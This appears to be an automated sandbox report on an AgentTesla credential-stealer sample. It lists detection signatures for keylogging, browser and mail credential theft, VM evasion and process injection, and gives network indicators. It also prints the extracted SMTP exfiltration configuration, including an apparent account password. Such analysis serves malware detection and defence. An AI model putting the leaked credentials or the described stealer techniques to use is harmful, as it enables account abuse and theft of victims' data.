Loading ...

Play interactive tourEdit tour

Analysis Report DUBAI CHEMEX REGA.exe

Overview

General Information

Sample Name:DUBAI CHEMEX REGA.exe
Analysis ID:385489
MD5:7a7078e03fd2fee66b7436da7222d2e0
SHA1:03f9dd35d1d16d69da789e8e1e0119f0163adaae
SHA256:b655965e57f392a0c5d82d2f248d432575b4f7092fa87a8bd868e56e6e32d546
Tags:AgentTeslaexe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains very large array initializations
Contains functionality to register a low level keyboard hook
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • DUBAI CHEMEX REGA.exe (PID: 6900 cmdline: 'C:\Users\user\Desktop\DUBAI CHEMEX REGA.exe' MD5: 7A7078E03FD2FEE66B7436DA7222D2E0)
    • DUBAI CHEMEX REGA.exe (PID: 3120 cmdline: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exe MD5: 7A7078E03FD2FEE66B7436DA7222D2E0)
  • AlxpSuW.exe (PID: 6564 cmdline: 'C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe' MD5: 7A7078E03FD2FEE66B7436DA7222D2E0)
    • AlxpSuW.exe (PID: 7044 cmdline: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe MD5: 7A7078E03FD2FEE66B7436DA7222D2E0)
  • AlxpSuW.exe (PID: 7000 cmdline: 'C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe' MD5: 7A7078E03FD2FEE66B7436DA7222D2E0)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "kishore@satguruclearing.comsatguru@9939*webmail.satguruclearing.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.665376821.0000000004579000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000004.00000002.911263049.0000000002B71000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000004.00000002.911263049.0000000002B71000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000009.00000002.746129783.00000000039B8000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000004.00000002.909140573.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 13 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            9.2.AlxpSuW.exe.3a3edf8.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              4.2.DUBAI CHEMEX REGA.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                9.2.AlxpSuW.exe.3a3edf8.2.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.DUBAI CHEMEX REGA.exe.45fedf8.3.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    0.2.DUBAI CHEMEX REGA.exe.45fedf8.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 3 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 4.2.DUBAI CHEMEX REGA.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "kishore@satguruclearing.comsatguru@9939*webmail.satguruclearing.com"}
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeReversingLabs: Detection: 25%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: DUBAI CHEMEX REGA.exeReversingLabs: Detection: 25%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeJoe Sandbox ML: detected
                      Machine Learning detection for sampleShow sources
                      Source: DUBAI CHEMEX REGA.exeJoe Sandbox ML: detected
                      Source: 4.2.DUBAI CHEMEX REGA.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 10.2.AlxpSuW.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: DUBAI CHEMEX REGA.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: DUBAI CHEMEX REGA.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49763 -> 208.91.199.135:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49764 -> 208.91.199.135:587
                      Source: global trafficTCP traffic: 192.168.2.4:49763 -> 208.91.199.135:587
                      Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                      Source: global trafficTCP traffic: 192.168.2.4:49763 -> 208.91.199.135:587
                      Source: unknownDNS traffic detected: queries for: webmail.satguruclearing.com
                      Source: DUBAI CHEMEX REGA.exe, 00000004.00000002.911263049.0000000002B71000.00000004.00000001.sdmp, AlxpSuW.exe, 0000000A.00000002.910963365.0000000003201000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: AlxpSuW.exe, 0000000A.00000002.910963365.0000000003201000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: AlxpSuW.exe, 0000000A.00000002.910963365.0000000003201000.00000004.00000001.sdmpString found in binary or memory: http://fhHdHb.com
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.664563832.000000000339A000.00000004.00000001.sdmp, DUBAI CHEMEX REGA.exe, 00000000.00000002.664541642.0000000003381000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.741183439.00000000027DC000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.741126162.00000000027C1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.664563832.000000000339A000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.741183439.00000000027DC000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4
                      Source: DUBAI CHEMEX REGA.exe, 00000004.00000002.911837506.0000000002EFC000.00000004.00000001.sdmpString found in binary or memory: http://webmail.satguruclearing.com
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.668995974.000000000638A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.668995974.000000000638A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comue
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000003.646661565.000000000639B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comc
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000003.646602465.000000000639B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comn
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000003.648227085.0000000006391000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnLog
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000003.648227085.0000000006391000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnrig)E
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000003.649641249.000000000638C000.00000004.00000001.sdmp, DUBAI CHEMEX REGA.exe, 00000000.00000003.649849888.000000000638C000.00000004.00000001.sdmp, DUBAI CHEMEX REGA.exe, 00000000.00000003.649977429.0000000006386000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000003.649641249.000000000638C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/.~6M
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000003.649641249.000000000638C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/5~
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000003.649849888.000000000638C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/9
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000003.649849888.000000000638C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/C~
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000003.649977429.0000000006386000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Q~)M
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000003.649754673.000000000638C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0o
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000003.649641249.000000000638C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/dd8
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000003.649641249.000000000638C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/e~
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000003.649641249.000000000638C000.00000004.00000001.sdmp, DUBAI CHEMEX REGA.exe, 00000000.00000003.649849888.000000000638C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000003.649754673.000000000638C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/.~6M
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000003.649754673.000000000638C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/5~
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000003.649527166.0000000006383000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/l~
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000003.649641249.000000000638C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/n
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000003.647546366.000000000639B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comym
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: DUBAI CHEMEX REGA.exe, 00000004.00000002.911770163.0000000002EDC000.00000004.00000001.sdmp, DUBAI CHEMEX REGA.exe, 00000004.00000003.862456569.0000000000D84000.00000004.00000001.sdmpString found in binary or memory: https://Ii19E5Eebc4fe8K8ng5D.com
                      Source: DUBAI CHEMEX REGA.exe, 00000004.00000002.911263049.0000000002B71000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%
                      Source: AlxpSuW.exe, 0000000A.00000002.910963365.0000000003201000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.664541642.0000000003381000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.741126162.00000000027C1000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.665376821.0000000004579000.00000004.00000001.sdmp, DUBAI CHEMEX REGA.exe, 00000004.00000002.909140573.0000000000402000.00000040.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.746129783.00000000039B8000.00000004.00000001.sdmp, AlxpSuW.exe, 0000000A.00000002.909153388.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: DUBAI CHEMEX REGA.exe, 00000004.00000002.911263049.0000000002B71000.00000004.00000001.sdmp, AlxpSuW.exe, 0000000A.00000002.910963365.0000000003201000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Contains functionality to register a low level keyboard hookShow sources
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4_2_01010BE0 SetWindowsHookExW 0000000D,00000000,?,?
                      Installs a global keyboard hookShow sources
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\DUBAI CHEMEX REGA.exe
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.663766023.0000000001550000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeWindow created: window name: CLIPBRDWNDCLASS
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary:

                      barindex
                      .NET source code contains very large array initializationsShow sources
                      Source: 4.2.DUBAI CHEMEX REGA.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b3A1953CEu002d913Fu002d4F9Au002dB9F7u002dB5A04C8C3548u007d/u003469103C2u002d05CBu002d457Au002dAA60u002d2FD346117A8C.csLarge array initialization: .cctor: array initializer size 11946
                      Source: 10.2.AlxpSuW.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b3A1953CEu002d913Fu002d4F9Au002dB9F7u002dB5A04C8C3548u007d/u003469103C2u002d05CBu002d457Au002dAA60u002d2FD346117A8C.csLarge array initialization: .cctor: array initializer size 11946
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA86B8 NtQueryInformationProcess,
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA86B0 NtQueryInformationProcess,
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_019BDB4C
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_019BC3A0
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_019BE213
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_019BA758
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA0EB0
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA0500
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA1D01
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA8471
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA9948
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA7928
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA3FA8
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA3FB8
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA0EA2
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA45C0
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA45D0
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA9D58
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA1D6A
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA2CE8
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA2CF8
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA04F0
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA0CA2
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA9C74
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA3C00
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA43E0
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA43F0
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA7BB8
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA2B00
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA41C0
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA5180
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA5190
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA41B0
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA3908
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA7922
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA9937
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA38F9
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_0EC802AD
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_0EC8026A
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_0EC80202
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_0EC8021B
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_0EC83CF8
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_0EC80040
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_0EC80011
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4_2_00F7AA98
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4_2_00F72A28
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4_2_00F74BC0
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4_2_00F74FCC
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4_2_00F71D90
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4_2_00F7DF24
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4_2_00F7BC60
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4_2_00F96890
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4_2_00F9E2B0
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4_2_00F93678
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4_2_00F95B30
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4_2_00FE2040
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4_2_00FE1C00
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4_2_00FE9D70
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4_2_00FE6A30
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4_2_00FE3FB8
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4_2_00FE3CC9
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4_2_00FE2081
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4_2_00FE9020
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4_2_00FEB5D0
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4_2_00FEDD08
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4_2_00FED3F0
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4_2_00FE6B67
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4_2_01011358
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4_2_0101B230
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4_2_00F70040
